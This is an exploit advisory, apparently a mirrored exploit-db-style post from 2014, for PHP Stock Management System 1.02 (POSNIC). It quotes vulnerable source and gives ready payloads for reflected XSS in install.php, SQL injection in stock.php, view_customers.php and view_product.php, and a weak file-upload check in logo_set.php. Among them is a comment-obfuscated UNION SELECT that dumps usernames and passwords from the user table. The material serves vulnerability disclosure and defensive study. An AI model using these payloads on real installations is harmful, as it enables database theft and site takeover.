扫码分享
验证:
体验盒子# Exploit Title: PHP Stock Management System 1.02 - Multiple Vulnerabilty
# Date : 9-9-2014
# Author : jsass
# Vendor Homepage: http://www.posnic.com/
# Software Link: http://sourceforge.net/projects/stockmanagement/
# Version: 1.02
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM
#########################################################################################################
XSSinstall.php
code :
if(isset($_REQUEST['msg'])) {
$msg=$_REQUEST['msg'];
echo "<p style=color:red>$msg</p>";
}
exploit :
http://localhost/demo/POSNIC1.02DesignFix/install.php?msg=1%22%3E%3Cscript%3Ealert%28%27jsass%27%29%3C/script%3E
#########################################################################################################
SQL INJECTION : stock.php
code :
include_once("init.php");
$q = strtolower($_GET["q"]);
if (!$q) return;
$db->query("SELECT * FROM stock_avail where quantity >0 ");
while ($line = $db->fetchNextObject()) {
if (strpos(strtolower($line->name), $q) !== false) {
echo "$line->name\n";
}
}
exploit :
localhost/demo/POSNIC1.02DesignFix/stock.php?q=2(inject)
#########################################################################################################
SQL INJECTION : view_customers.php
code :
$SQL = "SELECT * FROMcustomer_details";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$SQL = "SELECT * FROMcustomer_details WHERE customer_nameLIKE '%".$_POST['searchtxt']."%' OR customer_address LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%' OR customer_contact1 LIKE '%".$_POST['searchtxt']."%'";
}
exploit:
http://localhost/demo/POSNIC1.02DesignFix/view_customers.php
POST
searchtxt=1(inject)&Search=Search
searchtxt=-1' /*!UNION*/ /*!SELECT*/ 1,/*!12345CONCAT(id,0x3a,username,0x3a,password)*/,3,4,5,6+from stock_user-- -&Search=Search
#########################################################################################################
SQL INJECTION : view_product.php
code :
if(isset($_GET['limit']) && is_numeric($_GET['limit'])){
$limit=$_GET['limit'];
$_GET['limit']=10;
}
$page = $_GET['page'];
if($page)
$start = ($page - 1) * $limit; //first item to display on this page
else
$start = 0; //if no page var is given, set start to 0
/* Get data. */
$sql = "SELECT * FROM stock_details LIMIT $start, $limit ";
if(isset($_POST['Search']) AND trim($_POST['searchtxt'])!="")
{
$sql= "SELECT * FROMstock_details WHERE stock_name LIKE '%".$_POST['searchtxt']."%' OR stock_id LIKE '%".$_POST['searchtxt']."%' OR supplier_id LIKE '%".$_POST['searchtxt']."%' OR date LIKE '%".$_POST['searchtxt']."%'LIMIT $start, $limit";
}
$result = mysql_query($sql);
exploit :
localhost/demo/POSNIC1.02DesignFix/view_product.php?page=1&limit=1(inject)
and
localhost/demo/POSNIC1.02DesignFix/view_product.php
post
searchtxt=a(inject)&Search=Search
#########################################################################################################
UPLOAD :logo_set.php
code :
<?php if(isset($_POST['submit'])){
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
}
else
{
$upload= $_FILES["file"]["name"] ;
$type=$_FILES["file"]["type"];
exploit :
http://localhost/demo/POSNIC1.02DesignFix/logo_set.php
#########################################################################################################
AND MORE BUGS
Bye
#########################################################################################################
Great's : Nu11Byt3 , dzkabyle , Massacreur , Ze3r0Six , Hannibal , OrPh4ns , rDNix , OxAlien , Dead HackerZ , Somebody Knight
sec4ever.com & alm3refh.com
#########################################################################################################
体验盒子
